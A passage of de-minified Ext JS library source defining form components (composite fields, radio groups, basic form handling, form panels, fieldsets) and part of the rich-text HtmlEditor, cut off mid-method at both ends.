Ext.applyIf(e, {margins:this.defaultMargins})
}
}
this.fieldLabel = this.fieldLabel || this.buildLabel(g);
this.fieldErrors = new Ext.util.MixedCollection(true, function (h) {
return h.field
});
this.fieldErrors.on({scope:this, add:this.updateInvalidMark, remove:this.updateInvalidMark, replace:this.updateInvalidMark});
Ext.form.CompositeField.superclass.initComponent.apply(this, arguments);
this.innerCt = new Ext.Container({layout:"hbox", items:this.items, cls:"x-form-composite", defaultMargins:"0 3 0 0", ownerCt:this});
this.innerCt.ownerCt = undefined;
var a = this.innerCt.findBy(function (h) {
return h.isFormField
}, this);
this.items = new Ext.util.MixedCollection();
this.items.addAll(a)
}, onRender:function (c, a) {
if (!this.el) {
var d = this.innerCt;
d.render(c);
this.el = d.getEl();
if (this.combineErrors) {
this.eachItem(function (e) {
Ext.apply(e, {markInvalid:this.onFieldMarkInvalid.createDelegate(this, [e], 0), clearInvalid:this.onFieldClearInvalid.createDelegate(this, [e], 0)})
})
}
var b = this.el.parent().parent().child("label", true);
if (b) {
b.setAttribute("for", this.items.items[0].id)
}
}
Ext.form.CompositeField.superclass.onRender.apply(this, arguments)
}, onFieldMarkInvalid:function (d, c) {
var b = d.getName(), a = {field:b, errorName:d.fieldLabel || b, error:c};
this.fieldErrors.replace(b, a);
if (!d.preventMark) {
d.el.addClass(d.invalidClass)
}
}, onFieldClearInvalid:function (a) {
this.fieldErrors.removeKey(a.getName());
a.el.removeClass(a.invalidClass)
}, updateInvalidMark:function () {
var a = Ext.isIE6 && Ext.isStrict;
if (this.fieldErrors.length == 0) {
this.clearInvalid();
if (a) {
this.clearInvalid.defer(50, this)
}
} else {
var b = this.buildCombinedErrorMessage(this.fieldErrors.items);
this.sortErrors();
this.markInvalid(b);
if (a) {
this.markInvalid(b)
}
}
}, validateValue:function (c, a) {
var b = true;
this.eachItem(function (d) {
if (!d.isValid(a)) {
b = false
}
});
return b
}, buildCombinedErrorMessage:function (e) {
var d = [], b;
for (var c = 0, a = e.length; c < a; c++) {
b = e[c];
d.push(String.format("{0}: {1}", b.errorName, b.error))
}
return d.join("<br />")
}, sortErrors:function () {
var a = this.items;
this.fieldErrors.sort("ASC", function (g, d) {
var c = function (b) {
return function (i) {
return i.getName() == b
}
};
var h = a.findIndexBy(c(g.field)), e = a.findIndexBy(c(d.field));
return h < e ? -1 : 1
})
}, reset:function () {
this.eachItem(function (a) {
a.reset()
});
(function () {
this.clearInvalid()
}).defer(50, this)
}, clearInvalidChildren:function () {
this.eachItem(function (a) {
a.clearInvalid()
})
}, buildLabel:function (a) {
return Ext.clean(a).join(this.labelConnector)
}, isDirty:function () {
if (this.disabled || !this.rendered) {
return false
}
var a = false;
this.eachItem(function (b) {
if (b.isDirty()) {
a = true;
return false
}
});
return a
}, eachItem:function (b, a) {
if (this.items && this.items.each) {
this.items.each(b, a || this)
}
}, onResize:function (e, c, a, d) {
var b = this.innerCt;
if (this.rendered && b.rendered) {
b.setSize(e, c)
}
Ext.form.CompositeField.superclass.onResize.apply(this, arguments)
}, doLayout:function (c, b) {
if (this.rendered) {
var a = this.innerCt;
a.forceLayout = this.ownerCt.forceLayout;
a.doLayout(c, b)
}
}, beforeDestroy:function () {
Ext.destroy(this.innerCt);
Ext.form.CompositeField.superclass.beforeDestroy.call(this)
}, setReadOnly:function (a) {
if (a == undefined) {
a = true
}
a = !!a;
if (this.rendered) {
this.eachItem(function (b) {
b.setReadOnly(a)
})
}
this.readOnly = a
}, onShow:function () {
Ext.form.CompositeField.superclass.onShow.call(this);
this.doLayout()
}, onDisable:function () {
this.eachItem(function (a) {
a.disable()
})
}, onEnable:function () {
this.eachItem(function (a) {
a.enable()
})
}});
Ext.reg("compositefield", Ext.form.CompositeField);
Ext.form.Radio = Ext.extend(Ext.form.Checkbox, {inputType:"radio", markInvalid:Ext.emptyFn, clearInvalid:Ext.emptyFn, getGroupValue:function () {
var a = this.el.up("form") || Ext.getBody();
var b = a.child('input[name="' + this.el.dom.name + '"]:checked', true);
return b ? b.value : null
}, setValue:function (b) {
var a, d, c;
if (typeof b == "boolean") {
Ext.form.Radio.superclass.setValue.call(this, b)
} else {
if (this.rendered) {
a = this.getCheckEl();
c = a.child('input[name="' + this.el.dom.name + '"][value="' + b + '"]', true);
if (c) {
Ext.getCmp(c.id).setValue(true)
}
}
}
if (this.rendered && this.checked) {
a = a || this.getCheckEl();
d = this.getCheckEl().select('input[name="' + this.el.dom.name + '"]');
d.each(function (e) {
if (e.dom.id != this.id) {
Ext.getCmp(e.dom.id).setValue(false)
}
}, this)
}
return this
}, getCheckEl:function () {
if (this.inGroup) {
return this.el.up(".x-form-radio-group")
}
return this.el.up("form") || Ext.getBody()
}});
Ext.reg("radio", Ext.form.Radio);
Ext.form.RadioGroup = Ext.extend(Ext.form.CheckboxGroup, {allowBlank:true, blankText:"You must select one item in this group", defaultType:"radio", groupCls:"x-form-radio-group", getValue:function () {
var a = null;
this.eachItem(function (b) {
if (b.checked) {
a = b;
return false
}
});
return a
}, onSetValue:function (c, b) {
if (arguments.length > 1) {
var a = this.getBox(c);
if (a) {
a.setValue(b);
if (a.checked) {
this.eachItem(function (d) {
if (d !== a) {
d.setValue(false)
}
})
}
}
} else {
this.setValueForItem(c)
}
}, setValueForItem:function (a) {
a = String(a).split(",")[0];
this.eachItem(function (b) {
b.setValue(a == b.inputValue)
})
}, fireChecked:function () {
if (!this.checkTask) {
this.checkTask = new Ext.util.DelayedTask(this.bufferChecked, this)
}
this.checkTask.delay(10)
}, bufferChecked:function () {
var a = null;
this.eachItem(function (b) {
if (b.checked) {
a = b;
return false
}
});
this.fireEvent("change", this, a)
}, onDestroy:function () {
if (this.checkTask) {
this.checkTask.cancel();
this.checkTask = null
}
Ext.form.RadioGroup.superclass.onDestroy.call(this)
}});
Ext.reg("radiogroup", Ext.form.RadioGroup);
Ext.form.Hidden = Ext.extend(Ext.form.Field, {inputType:"hidden", shouldLayout:false, onRender:function () {
Ext.form.Hidden.superclass.onRender.apply(this, arguments)
}, initEvents:function () {
this.originalValue = this.getValue()
}, setSize:Ext.emptyFn, setWidth:Ext.emptyFn, setHeight:Ext.emptyFn, setPosition:Ext.emptyFn, setPagePosition:Ext.emptyFn, markInvalid:Ext.emptyFn, clearInvalid:Ext.emptyFn});
Ext.reg("hidden", Ext.form.Hidden);
Ext.form.BasicForm = Ext.extend(Ext.util.Observable, {constructor:function (b, a) {
Ext.apply(this, a);
if (Ext.isString(this.paramOrder)) {
this.paramOrder = this.paramOrder.split(/[\s,|]/)
}
this.items = new Ext.util.MixedCollection(false, function (c) {
return c.getItemId()
});
this.addEvents("beforeaction", "actionfailed", "actioncomplete");
if (b) {
this.initEl(b)
}
Ext.form.BasicForm.superclass.constructor.call(this)
}, timeout:30, paramOrder:undefined, paramsAsHash:false, waitTitle:"Please Wait...", activeAction:null, trackResetOnLoad:false, initEl:function (a) {
this.el = Ext.get(a);
this.id = this.el.id || Ext.id();
if (!this.standardSubmit) {
this.el.on("submit", this.onSubmit, this)
}
this.el.addClass("x-form")
}, getEl:function () {
return this.el
}, onSubmit:function (a) {
a.stopEvent()
}, destroy:function (a) {
if (a !== true) {
this.items.each(function (b) {
Ext.destroy(b)
});
Ext.destroy(this.el)
}
this.items.clear();
this.purgeListeners()
}, isValid:function () {
var a = true;
this.items.each(function (b) {
if (!b.validate()) {
a = false
}
});
return a
}, isDirty:function () {
var a = false;
this.items.each(function (b) {
if (b.isDirty()) {
a = true;
return false
}
});
return a
}, doAction:function (b, a) {
if (Ext.isString(b)) {
b = new Ext.form.Action.ACTION_TYPES[b](this, a)
}
if (this.fireEvent("beforeaction", this, b) !== false) {
this.beforeAction(b);
b.run.defer(100, b)
}
return this
}, submit:function (b) {
b = b || {};
if (this.standardSubmit) {
var a = b.clientValidation === false || this.isValid();
if (a) {
var c = this.el.dom;
if (this.url && Ext.isEmpty(c.action)) {
c.action = this.url
}
c.submit()
}
return a
}
var d = String.format("{0}submit", this.api ? "direct" : "");
this.doAction(d, b);
return this
}, load:function (a) {
var b = String.format("{0}load", this.api ? "direct" : "");
this.doAction(b, a);
return this
}, updateRecord:function (b) {
b.beginEdit();
var a = b.fields, d, c;
a.each(function (e) {
d = this.findField(e.name);
if (d) {
c = d.getValue();
if (Ext.type(c) !== false && c.getGroupValue) {
c = c.getGroupValue()
} else {
if (d.eachItem) {
c = [];
d.eachItem(function (g) {
c.push(g.getValue())
})
}
}
b.set(e.name, c)
}
}, this);
b.endEdit();
return this
}, loadRecord:function (a) {
this.setValues(a.data);
return this
}, beforeAction:function (a) {
this.items.each(function (c) {
if (c.isFormField && c.syncValue) {
c.syncValue()
}
});
var b = a.options;
if (b.waitMsg) {
if (this.waitMsgTarget === true) {
this.el.mask(b.waitMsg, "x-mask-loading")
} else {
if (this.waitMsgTarget) {
this.waitMsgTarget = Ext.get(this.waitMsgTarget);
this.waitMsgTarget.mask(b.waitMsg, "x-mask-loading")
} else {
Ext.MessageBox.wait(b.waitMsg, b.waitTitle || this.waitTitle)
}
}
}
}, afterAction:function (a, c) {
this.activeAction = null;
var b = a.options;
if (b.waitMsg) {
if (this.waitMsgTarget === true) {
this.el.unmask()
} else {
if (this.waitMsgTarget) {
this.waitMsgTarget.unmask()
} else {
Ext.MessageBox.updateProgress(1);
Ext.MessageBox.hide()
}
}
}
if (c) {
if (b.reset) {
this.reset()
}
Ext.callback(b.success, b.scope, [this, a]);
this.fireEvent("actioncomplete", this, a)
} else {
Ext.callback(b.failure, b.scope, [this, a]);
this.fireEvent("actionfailed", this, a)
}
}, findField:function (c) {
var b = this.items.get(c);
if (!Ext.isObject(b)) {
var a = function (d) {
if (d.isFormField) {
if (d.dataIndex == c || d.id == c || d.getName() == c) {
b = d;
return false
} else {
if (d.isComposite) {
return d.items.each(a)
} else {
if (d instanceof Ext.form.CheckboxGroup && d.rendered) {
return d.eachItem(a)
}
}
}
}
};
this.items.each(a)
}
return b || null
}, markInvalid:function (h) {
if (Ext.isArray(h)) {
for (var c = 0, a = h.length; c < a; c++) {
var b = h[c];
var d = this.findField(b.id);
if (d) {
d.markInvalid(b.msg)
}
}
} else {
var e, g;
for (g in h) {
if (!Ext.isFunction(h[g]) && (e = this.findField(g))) {
e.markInvalid(h[g])
}
}
}
return this
}, setValues:function (c) {
if (Ext.isArray(c)) {
for (var d = 0, a = c.length; d < a; d++) {
var b = c[d];
var e = this.findField(b.id);
if (e) {
e.setValue(b.value);
if (this.trackResetOnLoad) {
e.originalValue = e.getValue()
}
}
}
} else {
var g, h;
for (h in c) {
if (!Ext.isFunction(c[h]) && (g = this.findField(h))) {
g.setValue(c[h]);
if (this.trackResetOnLoad) {
g.originalValue = g.getValue()
}
}
}
}
return this
}, getValues:function (b) {
var a = Ext.lib.Ajax.serializeForm(this.el.dom);
if (b === true) {
return a
}
return Ext.urlDecode(a)
}, getFieldValues:function (a) {
var d = {}, e, b, c;
this.items.each(function (g) {
if (!g.disabled && (a !== true || g.isDirty())) {
e = g.getName();
b = d[e];
c = g.getValue();
if (Ext.isDefined(b)) {
if (Ext.isArray(b)) {
d[e].push(c)
} else {
d[e] = [b, c]
}
} else {
d[e] = c
}
}
});
return d
}, clearInvalid:function () {
this.items.each(function (a) {
a.clearInvalid()
});
return this
}, reset:function () {
this.items.each(function (a) {
a.reset()
});
return this
}, add:function () {
this.items.addAll(Array.prototype.slice.call(arguments, 0));
return this
}, remove:function (a) {
this.items.remove(a);
return this
}, cleanDestroyed:function () {
this.items.filterBy(
function (a) {
return !!a.isDestroyed
}).each(this.remove, this)
}, render:function () {
this.items.each(function (a) {
if (a.isFormField && !a.rendered && document.getElementById(a.id)) {
a.applyToMarkup(a.id)
}
});
return this
}, applyToFields:function (a) {
this.items.each(function (b) {
Ext.apply(b, a)
});
return this
}, applyIfToFields:function (a) {
this.items.each(function (b) {
Ext.applyIf(b, a)
});
return this
}, callFieldMethod:function (b, a) {
a = a || [];
this.items.each(function (c) {
if (Ext.isFunction(c[b])) {
c[b].apply(c, a)
}
});
return this
}});
Ext.BasicForm = Ext.form.BasicForm;
Ext.FormPanel = Ext.extend(Ext.Panel, {minButtonWidth:75, labelAlign:"left", monitorValid:false, monitorPoll:200, layout:"form", initComponent:function () {
this.form = this.createForm();
Ext.FormPanel.superclass.initComponent.call(this);
this.bodyCfg = {tag:"form", cls:this.baseCls + "-body", method:this.method || "POST", id:this.formId || Ext.id()};
if (this.fileUpload) {
this.bodyCfg.enctype = "multipart/form-data"
}
this.initItems();
this.addEvents("clientvalidation");
this.relayEvents(this.form, ["beforeaction", "actionfailed", "actioncomplete"])
}, createForm:function () {
var a = Ext.applyIf({listeners:{}}, this.initialConfig);
return new Ext.form.BasicForm(null, a)
}, initFields:function () {
var c = this.form;
var a = this;
var b = function (d) {
if (a.isField(d)) {
c.add(d)
} else {
if (d.findBy && d != a) {
a.applySettings(d);
if (d.items && d.items.each) {
d.items.each(b, this)
}
}
}
};
this.items.each(b, this)
}, applySettings:function (b) {
var a = b.ownerCt;
Ext.applyIf(b, {labelAlign:a.labelAlign, labelWidth:a.labelWidth, itemCls:a.itemCls})
}, getLayoutTarget:function () {
return this.form.el
}, getForm:function () {
return this.form
}, onRender:function (b, a) {
this.initFields();
Ext.FormPanel.superclass.onRender.call(this, b, a);
this.form.initEl(this.body)
}, beforeDestroy:function () {
this.stopMonitoring();
this.form.destroy(true);
Ext.FormPanel.superclass.beforeDestroy.call(this)
}, isField:function (a) {
return !!a.setValue && !!a.getValue && !!a.markInvalid && !!a.clearInvalid
}, initEvents:function () {
Ext.FormPanel.superclass.initEvents.call(this);
this.on({scope:this, add:this.onAddEvent, remove:this.onRemoveEvent});
if (this.monitorValid) {
this.startMonitoring()
}
}, onAdd:function (a) {
Ext.FormPanel.superclass.onAdd.call(this, a);
this.processAdd(a)
}, onAddEvent:function (a, b) {
if (a !== this) {
this.processAdd(b)
}
}, processAdd:function (a) {
if (this.isField(a)) {
this.form.add(a)
} else {
if (a.findBy) {
this.applySettings(a);
this.form.add.apply(this.form, a.findBy(this.isField))
}
}
}, onRemove:function (a) {
Ext.FormPanel.superclass.onRemove.call(this, a);
this.processRemove(a)
}, onRemoveEvent:function (a, b) {
if (a !== this) {
this.processRemove(b)
}
}, processRemove:function (a) {
if (!this.destroying) {
if (this.isField(a)) {
this.form.remove(a)
} else {
if (a.findBy) {
Ext.each(a.findBy(this.isField), this.form.remove, this.form);
this.form.cleanDestroyed()
}
}
}
}, startMonitoring:function () {
if (!this.validTask) {
this.validTask = new Ext.util.TaskRunner();
this.validTask.start({run:this.bindHandler, interval:this.monitorPoll || 200, scope:this})
}
}, stopMonitoring:function () {
if (this.validTask) {
this.validTask.stopAll();
this.validTask = null
}
}, load:function () {
this.form.load.apply(this.form, arguments)
}, onDisable:function () {
Ext.FormPanel.superclass.onDisable.call(this);
if (this.form) {
this.form.items.each(function () {
this.disable()
})
}
}, onEnable:function () {
Ext.FormPanel.superclass.onEnable.call(this);
if (this.form) {
this.form.items.each(function () {
this.enable()
})
}
}, bindHandler:function () {
var e = true;
this.form.items.each(function (g) {
if (!g.isValid(true)) {
e = false;
return false
}
});
if (this.fbar) {
var b = this.fbar.items.items;
for (var d = 0, a = b.length; d < a; d++) {
var c = b[d];
if (c.formBind === true && c.disabled === e) {
c.setDisabled(!e)
}
}
}
this.fireEvent("clientvalidation", this, e)
}});
Ext.reg("form", Ext.FormPanel);
Ext.form.FormPanel = Ext.FormPanel;
Ext.form.FieldSet = Ext.extend(Ext.Panel, {baseCls:"x-fieldset", layout:"form", animCollapse:false, onRender:function (b, a) {
if (!this.el) {
this.el = document.createElement("fieldset");
this.el.id = this.id;
if (this.title || this.header || this.checkboxToggle) {
this.el.appendChild(document.createElement("legend")).className = this.baseCls + "-header"
}
}
Ext.form.FieldSet.superclass.onRender.call(this, b, a);
if (this.checkboxToggle) {
var c = typeof this.checkboxToggle == "object" ? this.checkboxToggle : {tag:"input", type:"checkbox", name:this.checkboxName || this.id + "-checkbox"};
this.checkbox = this.header.insertFirst(c);
this.checkbox.dom.checked = !this.collapsed;
this.mon(this.checkbox, "click", this.onCheckClick, this)
}
}, onCollapse:function (a, b) {
if (this.checkbox) {
this.checkbox.dom.checked = false
}
Ext.form.FieldSet.superclass.onCollapse.call(this, a, b)
}, onExpand:function (a, b) {
if (this.checkbox) {
this.checkbox.dom.checked = true
}
Ext.form.FieldSet.superclass.onExpand.call(this, a, b)
}, onCheckClick:function () {
this[this.checkbox.dom.checked ? "expand" : "collapse"]()
}});
Ext.reg("fieldset", Ext.form.FieldSet);
Ext.form.HtmlEditor = Ext.extend(Ext.form.Field, {enableFormat:true, enableFontSize:true, enableColors:true, enableAlignments:true, enableLists:true, enableSourceEdit:true, enableLinks:true, enableFont:true, createLinkText:"Please enter the URL for the link:", defaultLinkValue:"http://", fontFamilies:["Arial", "Courier New", "Tahoma", "Times New Roman", "Verdana"], defaultFont:"tahoma", defaultValue:(Ext.isOpera || Ext.isIE6) ? " " : "​", actionMode:"wrap", validationEvent:false, deferHeight:true, initialized:false, activated:false, sourceEditMode:false, onFocus:Ext.emptyFn, iframePad:3, hideMode:"offsets", defaultAutoCreate:{tag:"textarea", style:"width:500px;height:300px;", autocomplete:"off"}, initComponent:function () {
this.addEvents("initialize", "activate", "beforesync", "beforepush", "sync", "push", "editmodechange");
Ext.form.HtmlEditor.superclass.initComponent.call(this)
}, createFontOptions:function () {
var d = [], b = this.fontFamilies, c, g;
for (var e = 0, a = b.length; e < a; e++) {
c = b[e];
g = c.toLowerCase();
d.push('<option value="', g, '" style="font-family:', c, ';"', (this.defaultFont == g ? ' selected="true">' : ">"), c, "</option>")
}
return d.join("")
}, createToolbar:function (e) {
var c = [];
var a = Ext.QuickTips && Ext.QuickTips.isEnabled();
function d(j, h, i) {
return{itemId:j, cls:"x-btn-icon", iconCls:"x-edit-" + j, enableToggle:h !== false, scope:e, handler:i || e.relayBtnCmd, clickEvent:"mousedown", tooltip:a ? e.buttonTips[j] || undefined : undefined, overflowText:e.buttonTips[j].title || undefined, tabIndex:-1}
}
if (this.enableFont && !Ext.isSafari2) {
var g = new Ext.Toolbar.Item({autoEl:{tag:"select", cls:"x-font-select", html:this.createFontOptions()}});
c.push(g, "-")
}
if (this.enableFormat) {
c.push(d("bold"), d("italic"), d("underline"))
}
if (this.enableFontSize) {
c.push("-", d("increasefontsize", false, this.adjustFont), d("decreasefontsize", false, this.adjustFont))
}
if (this.enableColors) {
c.push("-", {itemId:"forecolor", cls:"x-btn-icon", iconCls:"x-edit-forecolor", clickEvent:"mousedown", tooltip:a ? e.buttonTips.forecolor || undefined : undefined, tabIndex:-1, menu:new Ext.menu.ColorMenu({allowReselect:true, focus:Ext.emptyFn, value:"000000", plain:true, listeners:{scope:this, select:function (i, h) {
this.execCmd("forecolor", Ext.isWebKit || Ext.isIE ? "#" + h : h);
this.deferFocus()
}}, clickEvent:"mousedown"})}, {itemId:"backcolor", cls:"x-btn-icon", iconCls:"x-edit-backcolor", clickEvent:"mousedown", tooltip:a ? e.buttonTips.backcolor || undefined : undefined, tabIndex:-1, menu:new Ext.menu.ColorMenu({focus:Ext.emptyFn, value:"FFFFFF", plain:true, allowReselect:true, listeners:{scope:this, select:function (i, h) {
if (Ext.isGecko) {
this.execCmd("useCSS", false);
this.execCmd("hilitecolor", h);
this.execCmd("useCSS", true);
this.deferFocus()
} else {
this.execCmd(Ext.isOpera ? "hilitecolor" : "backcolor", Ext.isWebKit || Ext.isIE ? "#" + h : h);
this.deferFocus()
}
}}, clickEvent:"mousedown"})})
}
if (this.enableAlignments) {
c.push("-", d("justifyleft"), d("justifycenter"), d("justifyright"))
}
if (!Ext.isSafari2) {
if (this.enableLinks) {
c.push("-", d("createlink", false, this.createLink))
}
if (this.enableLists) {
c.push("-", d("insertorderedlist"), d("insertunorderedlist"))
}
if (this.enableSourceEdit) {
c.push("-", d("sourceedit", true, function (h) {
this.toggleSourceEdit(!this.sourceEditMode)
}))
}
}
var b = new Ext.Toolbar({renderTo:this.wrap.dom.firstChild, items:c});
if (g) {
this.fontSelect = g.el;
this.mon(this.fontSelect, "change", function () {
var h = this.fontSelect.dom.value;
this.relayCmd("fontname", h);
this.deferFocus()
}, this)
}
this.mon(b.el, "click", function (h) {
h.preventDefault()
});
this.tb = b;
this.tb.doLayout()
}, onDisable:function () {
this.wrap.mask();
Ext.form.HtmlEditor.superclass.onDisable.call(this)
}, onEnable:function () {
this.wrap.unmask();
Ext.form.HtmlEditor.superclass.onEnable.call(this)
}, setReadOnly:function (b) {
Ext.form.HtmlEditor.superclass.setReadOnly.call(this, b);
if (this.initialized) {
if (Ext.isIE) {
this.getEditorBody().contentEditable = !b
} else {
this.setDesignMode(!b)
}
var a = this.getEditorBody();
if (a) {
a.style.cursor = this.readOnly ? "default" : "text"
}
this.disableItems(b)
}
}, getDocMarkup:function () {
var a = Ext.fly(this.iframe).getHeight() - this.iframePad * 2;
return String.format('<html><head><style type="text/css">body{border: 0; margin: 0; padding: {0}px; height: {1}px; cursor: text}</style></head><body></body></html>', this.iframePad, a)
}, getEditorBody:function () {
var a = this.getDoc();
return a.body || a.documentElement
}, getDoc:function () {
return Ext.isIE ? this.getWin().document : (this.iframe.contentDocument || this.getWin().document)
}, getWin:function () {
return Ext.isIE ? this.iframe.contentWindow : window.frames[this.iframe.name]
}, onRender:function (b, a) {
Ext.form.HtmlEditor.superclass.onRender.call(this, b, a);
this.el.dom.style.border = "0 none";
this.el.dom.setAttribute("tabIndex", -1);
this.el.addClass("x-hidden");
if (Ext.isIE) {
this.el.applyStyles("margin-top:-1px;margin-bottom:-1px;")
}
this.wrap = this.el.wrap({cls:"x-html-editor-wrap", cn:{cls:"x-html-editor-tb"}});
this.createToolbar(this);
this.disableItems(true);
this.tb.doLayout();
this.createIFrame();
if (!this.width) {
var c = this.el.getSize();
this.setSize(c.width, this.height || c.height)
}
this.resizeEl = this.positionEl = this.wrap
}, createIFrame:function () {
var a = document.createElement("iframe");
a.name = Ext.id();
a.frameBorder = "0";
a.style.overflow = "auto";
a.src = Ext.SSL_SECURE_URL;
this.wrap.dom.appendChild(a);
this.iframe = a;
this.monitorTask = Ext.TaskMgr.start({run:this.checkDesignMode, scope:this, interval:100})
}, initFrame:function () {
Ext.TaskMgr.stop(this.monitorTask);
var b = this.getDoc();
this.win = this.getWin();
b.open();
b.write(this.getDocMarkup());
b.close();
var a = {run:function () {
var c = this.getDoc();
if (c.body || c.readyState == "complete") {
Ext.TaskMgr.stop(a);
this.setDesignMode(true);
this.initEditor.defer(10, this)
}
}, interval:10, duration:10000, scope:this};
Ext.TaskMgr.start(a)
}, checkDesignMode:function () {
if (this.wrap && this.wrap.dom.offsetWidth) {
var a = this.getDoc();
if (!a) {
return
}
if (!a.editorInitialized || this.getDesignMode() != "on") {
this.initFrame()
}
}
}, setDesignMode:function (b) {
var a = this.getDoc();
if (a) {
if (this.readOnly) {
b = false
}
a.designMode = (/on|true/i).test(String(b).toLowerCase()) ? "on" : "off"
}
}, getDesignMode:function () {
var a = this.getDoc();
if (!a) {
return""
}
return String(a.designMode).toLowerCase()
}, disableItems:function (a) {
if (this.fontSelect) {
this.fontSelect.dom.disabled = a
}
this.tb.items.each(function (b) {
if (b.getItemId() != "sourceedit") {
b.setDisabled(a)
}
})
}, onResize:function (b, c) {
Ext.form.HtmlEditor.superclass.onResize.apply(this, arguments);
if (this.el && this.iframe) {
if (Ext.isNumber(b)) {
var e = b - this.wrap.getFrameWidth("lr");
this.el.setWidth(e);
this.tb.setWidth(e);
this.iframe.style.width = Math.max(e, 0) + "px"
}
if (Ext.isNumber(c)) {
var a = c - this.wrap.getFrameWidth("tb") - this.tb.el.getHeight();
this.el.setHeight(a);
this.iframe.style.height = Math.max(a, 0) + "px";
var d = this.getEditorBody();
if (d) {
d.style.height = Math.max((a - (this.iframePad * 2)), 0) + "px"
}
}
}
}, toggleSourceEdit:function (b) {
var d, a;
if (b === undefined) {
b = !this.sourceEditMode
}
this.sourceEditMode = b === true;
var c = this.tb.getComponent("sourceedit");
if (c.pressed !== this.sourceEditMode) {
c.toggle(this.sourceEditMode);
if (!c.xtbHidden) {
return
}
}
if (this.sourceEditMode) {
this.previousSize = this.getSize();
d = Ext.get(this.iframe).getHeight();
this.disableItems(true);
this.syncValue();
this.iframe.className = "x-hidden";
this.el.removeClass("x-hidden");
this.el.dom.removeAttribute("tabIndex");
this.el.focus();
this.el.dom.style.height = d + "px"
} else {
a = parseInt(this.el.dom.style.height, 10);
if (this.initialized) {
this.disableItems(this.readOnly)
}
this.pushValue();
this.iframe.className = "";
this.el.addClass("x-hidden");
this.el.dom.setAttribute("tabIndex", -1);
this.deferFocus();
this.setSize(this.previousSize);
delete this.previousSize;
this.iframe.style.height = a + "px"
}
this.fireEvent("editmodechange", this, this.sourceEditMode)
}, createLink:function () {
var a = prompt(this.createLinkText, this.defaultLinkValue);
if (a && a != "http://") {
this.relayCmd("createlink", a)
}
}, initEvents:function () {
this.originalValue = this.getValue()
}, markInvalid:Ext.emptyFn, clearInvalid:Ext.emptyFn, setValue:function (a) {
Ext.form.HtmlEditor.superclass.setValue.call(this, a);
this.pushValue();
return this
}, cleanHtml:function (a) {
a = String(a);
if (Ext.isWebKit) {
a = a.replace(/\sclass="(?:Apple-style-span|khtml-block-placeholder)"/gi, "")
}
if (a.charCodeAt(0) == this.defaultValue.replace(/\D/g, "")) {
a = a.substring(1)
}
return a
}, syncValue:function () {
if (this.initialized) {
var d = this.getEditorBody();
var c = d.innerHTML;
if (Ext.isWebKit) {
var b = d.getAttribute("style");
var a = b.match(/text-align:(.*?);/i);
if (a && a[1]) {
c = '<div style="' + a[0] + '">' + c + "</div>"
}
}
c = this.cleanHtml(c);
if (this.fireEvent("beforesync", this, c) !== false) {
this.el.dom.value = c;
this.fireEvent("sync", this, c)
}
}
}, getValue:function () {
this[this.sourceEditMode ? "pushValue" : "syncValue"]();
return Ext.form.HtmlEditor.superclass.getValue.call(this)
}, pushValue:function () {
if (this.initialized) {
var a = this.el.dom.value;
if (!this.activated && a.length < 1) {
a = this.defaultValue
}
if (this.fireEvent("beforepush", this, a) !== false) {
this.getEditorBody().innerHTML = a;
if (Ext.isGecko) {
this.setDesignMode(false);
this.setDesignMode(true)
}
this.fireEvent("push", this, a)
}
}
}, deferFocus:function () {
this.focus.defer(10, this)
}, focus:function () {
if (this.win && !this.sourceEditMode) {
this.win.focus()
} else {
this.el.focus()
}
}, initEditor:function () {
try {
var c = this.getEditorBody(), a = this.el.getStyles("font-size", "font-family", "background-image", "background-repeat", "background-color", "color"), g, b;
a["background-attachment"] = "fixed";
c.bgProperties = "fixed";
Ext.DomHelper.applyStyles(c, a);
g = this.getDoc();
if (g) {
try {
Ext.EventManager.removeAll(g)
} catch (d) {
}
}
b = this.onEditorEvent.createDelegate(this);
Ext.EventManager.on(g, {mousedown:b, dblclick:b, click:b, keyup:b, buffer:100});
if (Ext.isGecko) {
Ext.EventManager.on(g, "keypress", this.applyCommand, this)
}
if (Ext.isIE || Ext.isWebKit || Ext.isOpera) {
Ext.EventManager.on(g, "keydown", this.fixKeys, this)
}
g.editorInitialized = true;
this.initialized = true;
this.pushValue();
this.setReadOnly(this.readOnly);
this.fireEvent("initialize", this)
} catch (d) {
}
}, beforeDestroy:function () {
if (this.monitorTask) {
Ext.TaskMgr.stop(this.monitorTask)
}
if (this.rendered) {
Ext.destroy(this.tb);
var b = this.getDoc();
if (b) {
try {
Ext.EventManager.removeAll(b);
for (var c in b) {
delete b[c]
}
} catch (a) {
}
}
if (this.wrap) {
this.wrap.dom.innerHTML = "";
this.wrap.remove()
}
}
Ext.form.HtmlEditor.superclass.beforeDestroy.call(this)
}, onFirstFocus:function () {
this.activated = true;
this.disableItems(this.readOnly);
if (Ext.isGecko) {
this.win.focus();
var a = this.win.getSelection();
if (!a.focusNode || a.focusNode.nodeType != 3) {
var b = a.getRangeAt(0);
b.selectNodeContents(this.getEditorBody());
b.collapse(true);
this.deferFocus()
}
try {
this.execCmd("useCSS", true);
this.execCmd("styleWithCSS", false)
} catch (c) {
}
}
this.fireEvent("activate", this)
}, adjustFont:function (b) {
var d = b.getItemId() == "increasefontsize" ? 1 : -1, c = this.getDoc(), a = parseInt(c.queryCommandValue("FontSize") || 2, 10);
if ((Ext.isSafari && !Ext.isSafari2) || Ext.isChrome || Ext.isAir) {
if (a <= 10) {
a = 1 + d
} else {
if (a <= 13) {
a = 2 + d
} else {
if (a <= 16) {
a = 3 + d
} else {
if (a <= 18) {
a = 4 + d
} else {
if (a <= 24) {
a = 5 + d
} else {
a = 6 + d
}
}
}
}
}
a = a.constrain(1, 6)
} else {
if (Ext.isSafari) {
d *= 2
}
a = Math.max(1, a + d) + (Ext.isSafari ? "px" : 0)
}
this.execCmd("FontSize", a)
}, onEditorEvent:function (a) {
this.updateToolbar()
}, updateToolbar:function () {
if (this.readOnly) {
return
}
if (!this.activated) {
this.onFirstFocus();
return
}
var b = this.tb.items.map, c = this.getDoc();
if (this.enableFont && !Ext.isSafari2) {
var a = (c.queryCommandValue("FontName") || this.defaultFont).toLowerCase();
if (a != this.fontSelect.dom.value) {
this.fontSelect.dom.value = a
}
}
if (this.enableFormat) {
b.bold.toggle(c.queryCommandState("bold"));
b.italic.toggle(c.queryCommandState("italic"));
b.underline.toggle(c.queryCommandState("underline"))
}
if (this.enableAlignments) {
b.justifyleft.toggle(c.queryCommandState("justifyleft"));
b.justifycenter.toggle(c.queryCommandState("justifycenter"));
b.justifyright.toggle(c.queryCommandState("justifyright"))
}
if (!Ext.isSafari2 && this.enableLists) {
b.insertorderedlist.toggle(c.queryCommandState("insertorderedlist"));
